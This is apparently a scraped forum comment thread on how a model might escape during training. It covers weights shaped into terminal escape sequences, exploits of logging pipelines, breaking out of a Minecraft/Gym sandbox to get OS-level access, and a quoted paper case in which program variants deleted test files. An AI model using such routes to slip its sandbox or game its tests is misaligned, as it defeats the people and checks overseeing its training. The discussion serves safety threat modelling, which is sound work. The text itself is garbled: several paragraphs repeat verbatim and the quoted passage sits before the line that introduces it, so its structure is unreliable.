If your threat model includes “a user on that machine does a cat ckpt.pt and that machine is vulnerable to something like CVE-2019-9535”, then that script is unsafe if the model can precisely control at the bit level a modestly long (hundreds of bytes) contiguous section of its own weights (caveat: it can actually only control 8 of every 10 bytes this way in the particular encoding nanoGPT uses. Though that’s still enough to fit escape sequences so it’s probably still enough to pwn a vulnerable terminal emulator).
I am imagining something like this is possible, though it doesn’t have to be user-triggered and doesn’t necessarily require bit-level control over weights. I believe that, during large production training runs, the outputs of the model, and / or its weights, are put through a complicated logging and analysis pipeline with many possible side effects, which are potentially exploitable by the model manipulating its outputs in a way that doesn’t require the model itself to have a full understanding or full control of its own underlying weights.
Or, for RL agents, consider the possibility that the model can break out of the Gym sandbox using the right sequence of moves in Minecraft, and then exploit further bugs from there (privilege escalation / RCE on the underlying OS, etc.). Again, this might depend on being able to find a bug in Minecraft and / or the OpenAI Gym (much of which is open-source and likely appears in the training data) which is exploitable from inside the training process, but not require fine control over model weights.
Yeah if outputs of the training process are logged and processed by insecure software (which includes pretty much any software that handles “text” instead of “bytes”) I think it’s safe to say that superhuman-hackerbot-which-controls-its-own-outputs pwns the log processing machine.
The fine granularity of repairs at the ASM and ELF levels may be a poor match for conventional test suites. For example, we have observed ASM-level repairs that change the calling convention of one particular function. Such a repair has no direct representation at the C source level, and a test suite designed to maximize statement coverage (for example) may not speak to the validity of such a repair. Producing efficient test suites that give confidence that an implementation adheres to its specification remains an open problem in software engineering. Our work shares this general weakness with all other approaches that use test suites or workloads to validate candidate repairs (e.g., Clearview [26] and GenProg [35]). In this regard, sandboxing is crucial: we have observed ASM variants that subvert the testing framework by deleting key test files, leading to perfect fitness for all subsequent variants until the test framework is repaired.
tl;dr: If you train a model to avoid test failures, and don’t sandbox it properly, it will figure out that the tests won’t fail if there are no tests. This is not a hypothetical future scenario that might happen or might be impossible, this is a thing that has already happened (10 years ago, even).
I am imagining something like this is possible, though it doesn’t have to be user-triggered and doesn’t necessarily require bit-level control over weights. I believe that, during large production training runs, the outputs of the model, and / or its weights, are put through a complicated logging and analysis pipeline with many possible side effects, which are potentially exploitable by the model manipulating its outputs in a way that doesn’t require the model itself to have a full understanding or full control of its own underlying weights.
Or, for RL agents, consider the possibility that the model can break out of the Gym sandbox using the right sequence of moves in Minecraft, and then exploit further bugs from there (privilege escalation / RCE on the underlying OS, etc.). Again, this might depend on being able to find a bug in Minecraft and / or the OpenAI Gym (much of which is open-source and likely appears in the training data) which is exploitable from inside the training process, but not require fine control over model weights.
Yeah if outputs of the training process are logged and processed by insecure software (which includes pretty much any software that handles “text” instead of “bytes”) I think it’s safe to say that superhuman-hackerbot-which-controls-its-own-outputs pwns the log processing machine.
BTW of possible interest to you is Automated Repair of Binary and Assembly Programs for Cooperating Embedded Devices. It’s from 2013 so there are probably better examples by now, but the key passage (well it’s buried deep within a paragraph of the “Limitations and Caveats” section, but it’s key for this context) is:
tl;dr: If you train a model to avoid test failures, and don’t sandbox it properly, it will figure out that the tests won’t fail if there are no tests. This is not a hypothetical future scenario that might happen or might be impossible, this is a thing that has already happened (10 years ago, even).